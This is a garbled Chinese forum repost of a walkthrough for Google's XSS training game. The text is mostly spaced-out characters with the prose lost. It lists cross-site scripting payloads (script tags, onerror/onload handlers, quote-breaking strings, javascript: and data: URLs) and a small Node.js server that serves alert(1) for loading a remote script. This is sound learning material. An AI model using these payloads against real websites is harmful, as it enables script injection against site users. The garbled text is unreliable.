搜索

[8078] 2014-06-09_玩转Google的XSS游戏

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-17
2014-06-09_玩转Google的XSS游戏 G o o g l e X S S F r e e B u f   2 0 1 4 - 0 6 - 0 9   T a s k i l l e r H i G o o g l e X S S h t t p s : / / x s s - g a m e . a p p s p o t . c o m / L e v e l   1 :   H e l l o ,   w o r l d   o f   X S S < s c r i p t > a l e r t ( 1 ) ; < / s c r i p t > L e v e l   2 :   P e r s i s t e n c e   i s   k e y < a   h r e f = " t e s t "   o n c l i c k = " j a v a s c r i p t : a l e r t ( 1 ) ; " > t e s t < / a > < i m g   s r c = " t e s t . p n g "   o n e r r o r = " j a v a s c r i p t : a l e r t ( 1 ) ; " / > 使 o n e r r o r < i m g   s r c = " h t t p s : / / x s s - g a m e . a p p s p o t . c o m / s t a t i c / l e v e l 2 _ i c o n . p n g " o n l o a d = " a l e r t ( 1 ) ; "   / > 使 o n l o a d L e v e l   3 :   T h a t   s i n k i n g   f e e l i n g 使 w i n d o w . l o c a t i o n . h a s h   j a v a s c r i p t 1 . j p g '   o n l o a d = ' j a v a s c r i p t : a l e r t ( 1 ) ; ' 使 o n l o a d '   o n e r r o r = " a l e r t ( 1 ) " > 使 o n e r r o r 使 s c r i p t   ' > < s c r i p t > a l e r t ( 1 ) ; < / s c r i p t >
L e v e l   4 :   C o n t e x t   m a t t e r s 1 ' ) % 3 B a l e r t ( ' 1 1 % 2 7 ) % 3 b a l e r t ( % 2 7 1 使 | | 1 ' )   | |   a l e r t ( ' 1 / 1 ' ) ; a l e r t ( 1 ) ; / / L e v e l   5 :   B r e a k i n g   p r o t o c o l 使 j a v a s c r i p t : a l e r t ( 1 ) ; a l e r t L e v e l   6 :   F o l l o w   t h e   r a b b i t 使 d a t a : t e x t / j a v a s c r i p t d a t a : t e x t / j a v a s c r i p t , a l e r t ( 1 ) ; H T T P h t t p H T T P : / / 1 2 7 . 0 . 0 . 1 : 8 0 0 0 [ ] h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 0 0 a l e r t ( 1 ) j a v a s c r i p t H T T P 使 H T T P S H T T P S 使 N o d e . j s v a r   h t t p s   =   r e q u i r e ( ' h t t p s ' ) ; v a r   f s   =   r e q u i r e ( ' f s ' ) ;   v a r   h s k e y   =   f s . r e a d F i l e S y n c ( ' s e r v e r . k e y ' ) ; v a r   h s c e r t   =   f s . r e a d F i l e S y n c ( ' s e r v e r . c r t ' )   v a r   o p t i o n s   =   {         k e y :   h s k e y ,
        c e r t :   h s c e r t } ;   h t t p s . c r e a t e S e r v e r ( o p t i o n s ,   f u n c t i o n   ( r e q ,   r e s ) {         r e s . w r i t e H e a d ( 2 0 0 ) ;         r e s . e n d ( " a l e r t ( 1 ) ; " ) ; } ) . l i s t e n ( 8 0 0 0 ) ; N o d e . j s H T T P S 使 / / w e b s i t e . c o m / e v i l s c r i p t . j s / / 使 h t t p s h t t p 使 H T T P S / / 1 2 7 . 0 . 0 . 1 : 8 0 0 0 D o n e . h t t p : / / p a u l s e c . g i t h u b . i o / b l o g / 2 0 1 4 / 0 6 / 0 2 / d i v i n g - i n t o - x s s - g o o g l e s - g a m e /
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理